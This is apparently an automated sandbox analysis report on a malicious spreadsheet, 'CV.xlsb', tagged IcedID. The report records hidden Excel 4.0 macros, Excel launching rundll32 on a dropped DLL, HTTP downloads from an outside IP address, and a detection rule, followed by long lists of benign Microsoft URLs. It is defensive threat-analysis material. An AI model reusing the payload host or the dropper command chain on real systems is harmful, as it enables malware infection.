Loading ...

Play interactive tourEdit tour

Analysis Report CV.xlsb

Overview

General Information

Sample Name:CV.xlsb
Analysis ID:320216
MD5:08b6718f28bd303f0b407e0ec0f30872
SHA1:824489d6a73609db8763172a2e9f2e9d9f7c63a4
SHA256:65d6c6478fb750394d0517f5ff77fa13dfd354dbbec4cff3ec9e897bf8e3e926
Tags:IcedIDmacrosxlsx

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Sigma detected: Microsoft Office Product Spawning Windows Shell
IP address seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 5864 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 6552 cmdline: 'C:\Windows\System32\rundll32.exe' C:\gPOCoPl\xMtLxCb\WSGaRIW.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis: Data: Command: 'C:\Windows\System32\rundll32.exe' C:\gPOCoPl\xMtLxCb\WSGaRIW.dll,DllRegisterServer, CommandLine: 'C:\Windows\System32\rundll32.exe' C:\gPOCoPl\xMtLxCb\WSGaRIW.dll,DllRegisterServer, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 5864, ProcessCommandLine: 'C:\Windows\System32\rundll32.exe' C:\gPOCoPl\xMtLxCb\WSGaRIW.dll,DllRegisterServer, ProcessId: 6552

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for domain / URLShow sources
Source: http://205.185.113.20/BVd1qKwdVirustotal: Detection: 10%Perma Link
Source: http://205.185.113.20/BVd1qKwdVirustotal: Detection: 10%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: CV.xlsbVirustotal: Detection: 9%Perma Link
Source: CV.xlsbReversingLabs: Detection: 14%
Source: CV.xlsbVirustotal: Detection: 9%Perma Link
Source: CV.xlsbReversingLabs: Detection: 14%

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exeJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exeJump to behavior
Source: global trafficTCP traffic: 192.168.2.4:49730 -> 205.185.113.20:80
Source: global trafficTCP traffic: 192.168.2.4:49730 -> 205.185.113.20:80
Source: global trafficTCP traffic: 192.168.2.4:49730 -> 205.185.113.20:80
Source: global trafficTCP traffic: 192.168.2.4:49730 -> 205.185.113.20:80
Source: Joe Sandbox ViewIP Address: 205.185.113.20 205.185.113.20
Source: Joe Sandbox ViewIP Address: 205.185.113.20 205.185.113.20
Source: global trafficHTTP traffic detected: GET /BVd1qKwd HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 205.185.113.20Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /BVd1qKwd HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 205.185.113.20Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.113.20
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.113.20
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.113.20
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.113.20
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.113.20
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.113.20
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.113.20
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.113.20
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.113.20
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.113.20
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.113.20
Source: unknownTCP traffic detected without corresponding DNS query: 205.185.113.20
Source: global trafficHTTP traffic detected: GET /BVd1qKwd HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 205.185.113.20Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /BVd1qKwd HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 205.185.113.20Connection: Keep-Alive
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Nov 2020 06:13:37 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveCache-Control: no-cache, no-store, must-revalidate,post-check=0,pre-check=0Expires: 0Last-Modified: Thu, 19 Nov 2020 06:13:37 GMTPragma: no-cacheSet-Cookie: _subid=1p924021ov5;Expires=Sunday, 20-Dec-2020 06:13:37 GMT;Max-Age=2678400;Path=/Vary: Accept-Encoding
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Nov 2020 06:13:37 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveCache-Control: no-cache, no-store, must-revalidate,post-check=0,pre-check=0Expires: 0Last-Modified: Thu, 19 Nov 2020 06:13:37 GMTPragma: no-cacheSet-Cookie: _subid=1p924021ov5;Expires=Sunday, 20-Dec-2020 06:13:37 GMT;Max-Age=2678400;Path=/Vary: Accept-Encoding
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://api.aadrm.com/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://api.office.net
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://api.onedrive.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://augloop.office.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://augloop.office.com/v2
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://autodiscover-s.outlook.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://cdn.entity.
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://clients.config.office.net/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://config.edge.skype.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://cortana.ai
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://cr.office.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://devnull.onenote.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://directory.services.
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://graph.windows.net
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://graph.windows.net/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://lifecycle.office.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://login.windows.local
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://management.azure.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://management.azure.com/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://messaging.office.com/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://ncus-000.contentsync.
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://officeapps.live.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://onedrive.live.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://outlook.office.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://outlook.office365.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://powerlift.acompli.net
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://settings.outlook.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://store.office.com/addinstemplate
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://tasks.office.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://templatelogging.office.com/client/log
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://wus2-000.contentsync.
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://www.odwebp.svc.ms
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://api.aadrm.com/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://api.office.net
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://api.onedrive.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://augloop.office.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://augloop.office.com/v2
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://autodiscover-s.outlook.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://cdn.entity.
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://clients.config.office.net/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
